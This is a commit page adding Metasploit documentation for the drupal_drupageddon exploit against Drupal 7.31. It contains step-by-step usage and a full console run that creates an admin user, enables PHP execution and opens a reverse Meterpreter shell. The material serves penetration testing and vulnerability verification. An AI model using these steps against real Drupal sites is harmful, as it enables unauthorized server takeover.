Land #7322, drupal_drupageddon module docs
This commit is contained in:
commit
030e09c9c6
|
@ -0,0 +1,57 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
Drupal 7.31 official [download](https://ftp.drupal.org/files/projects/drupal-7.31.tar.gz)
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Install the application
|
||||||
|
2. Start msfconsole
|
||||||
|
3. Do: `use exploit/multi/http/drupal_drupageddon`
|
||||||
|
4. Do: `set rhost <ip>`
|
||||||
|
5. Do: `run`
|
||||||
|
6. You should get a shell.
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
This is a run against a Drupal 7.31 linux box.
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/multi/http/drupal_drupageddon
|
||||||
|
msf exploit(drupal_drupageddon)
|
||||||
|
msf exploit(drupal_drupageddon) > set rhost 1.1.1.1
|
||||||
|
rhost => 1.1.1.1
|
||||||
|
msf exploit(drupal_drupageddon) > set verbose true
|
||||||
|
verbose => true
|
||||||
|
msf exploit(drupal_drupageddon) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 2.2.2.2:4444
|
||||||
|
[*] Testing page
|
||||||
|
[*] form_build_id: form-a1VaaaEaa0lUvL79wIAfdQEaaJRw8P7a1aWGXElI_Go
|
||||||
|
[*] form_token:
|
||||||
|
[*] password hash: $P\$8zAAApjTciVA2qz7HdAA0UjAAwUft00
|
||||||
|
[*] Creating new user AaCaUlLaPR:AAgeAAAAjA
|
||||||
|
[*] Logging in as AaCaUlLaPR:AAgeAAAAjA
|
||||||
|
[*] cookie: SESS911797186fac11111d08b1111a15db55=aaSfinhC0AAAAbzhAoO3bBaaOerRrvpn3cL0rA77Dhg;
|
||||||
|
[*] Trying to parse enabled modules
|
||||||
|
[*] form_build_id: form-YZljDkG8n5AAaAaAaaaYGLaP8MIfdif5VfwjQMMxdN0
|
||||||
|
[*] form_token: Bj92oAaAaWRwqyAAAySWQpeUI03aA9wfkAozXsk_t_E
|
||||||
|
[*] Enabling the PHP filter module
|
||||||
|
[*] Setting permissions for PHP filter module
|
||||||
|
[*] form_build_id: form-1Z1pAg11amM-1jHALgm1AAAAA1JdwAAA1qXnSTZahPA
|
||||||
|
[*] form_token: kAA1A1AfqK_PvJQi1AAAAAAAAxyGyLvHemBor1q11Z1
|
||||||
|
[*] admin role id: 3
|
||||||
|
[*] Getting tokens from create new article page
|
||||||
|
[*] form_build_id: form-_-leQaaaAAeBXbAaAAaaAAx1IrYSI1qeA2OGf2Ce1vs
|
||||||
|
[*] form_token: Ib1y8aAaaAAAdapA53kUcfWf7msTRHiDUb_CIKzAAAA
|
||||||
|
[*] Calling preview page. Exploit should trigger...
|
||||||
|
[*] Sending stage (33721 bytes) to 1.1.1.1
|
||||||
|
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:45388) at 2016-08-25 11:30:41 -0400
|
||||||
|
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : drupal
|
||||||
|
OS : Linux drupal 2.6.32-642.3.1.el6.x86_64 #1 SMP Sun Jun 26 18:16:44 EDT 2016 x86_64
|
||||||
|
Meterpreter : php/linux
|
||||||
|
|
||||||
|
meterpreter > getuid
|
||||||
|
Server username: apache (48)
|
||||||
|
```
|
Loading…
Reference in New Issue